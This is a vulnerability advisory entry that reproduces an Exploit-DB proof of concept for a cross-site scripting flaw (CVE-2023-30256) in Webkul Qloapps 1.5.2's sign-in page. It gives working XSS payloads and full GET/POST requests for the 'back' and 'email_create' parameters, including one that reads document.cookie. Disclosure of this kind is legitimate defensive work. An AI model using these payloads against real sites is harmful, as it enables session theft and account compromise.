Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)

vendor:

Qloapps

by:

Astik Rawat (ahrixia)

6.1

CVSS

MEDIUM

Cross-Site Scripting (XSS)

CWE

Product Name: Qloapps

Affected Version From: 1.5.2002

Affected Version To: 1.5.2002

Patch Exists: YES

Related CWE: CVE-2023-30256

CPE: a:webkul:qloapps:1.5.2

Metasploit:

Other Scripts:

Tags: packetstorm,cve,cve2023,xss,webkul-qloapps,unauth

CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Nuclei References: https://github.com/webkul/hotelcommerce, http://packetstormsecurity.com/files/172542/Webkul-Qloapps-1.5.2-Cross-Site-Scripting.html, https://github.com/ahrixia/CVE-2023-30256, https://nvd.nist.gov/vuln/detail/CVE-2023-30256, https://qloapps.com/

Nuclei Metadata: {'max-request': 1, 'verified': 'true', 'vendor': 'webkul', 'product': 'qloapps'}

Platforms Tested: Kali Linux 2022.4

2023

Webkul Qloapps 1.5.2 – Cross-Site Scripting (XSS)

A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system. The vulnerability can be exploited through the 'back' and 'email_create' parameters.

Mitigation:

To mitigate this vulnerability, input validation and output encoding should be implemented to prevent malicious user input from being executed as code.

Source

Exploit-DB raw data:

# Exploit Title: Webkul Qloapps 1.5.2 - Cross-Site Scripting (XSS)
# Date: 15 May 2023
# Exploit Author: Astik Rawat (ahrixia)
# Vendor Homepage: https://qloapps.com/
# Software Link: https://github.com/webkul/hotelcommerce
# Version: 1.5.2
# Tested on: Kali Linux 2022.4
# CVE : CVE-2023-30256


Description:

A Cross Site Scripting (XSS) vulnerability exists in Webkul Qloapps which is a free and open-source hotel reservation & online booking system written in PHP and distributed under OSL-3.0 Licence.

Steps to exploit:
1) Go to Signin page on the system.
2) There are two parameters which can be exploited via XSS
	- back
	- email_create

2.1) Insert your payload in the "back"- GET and POST Request 
	Proof of concept (Poc):
	The following payload will allow you to execute XSS - 
	
	Payload (Plain text): 
	xss onfocus=alert(1) autofocus= xss

	Payload (URL Encoded): 
	xss%20onfocus%3dalert(1)%20autofocus%3d%20xss

	Full GET Request (back): 
	[http://localhost/hotelcommerce-1.5.2/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(1)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d]

2.2) Insert your payload in the "email_create" - POST Request Only
	Proof of concept (Poc):
	The following payload will allow you to execute XSS - 

	Payload (Plain text): 
	xss><img src=a onerror=alert(document.cookie)>xss

	Payload (URL Encoded): 
	xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss

	POST Request (email_create) (POST REQUEST DATA ONLY): 
	[controller=authentication&SubmitCreate=1&ajax=true&email_create=xss%3e%3cimg%20src%3da%20onerror%3dalert(document.cookie)%3exss&back=my-account&token=6c62b773f1b284ac4743871b300a0c4d]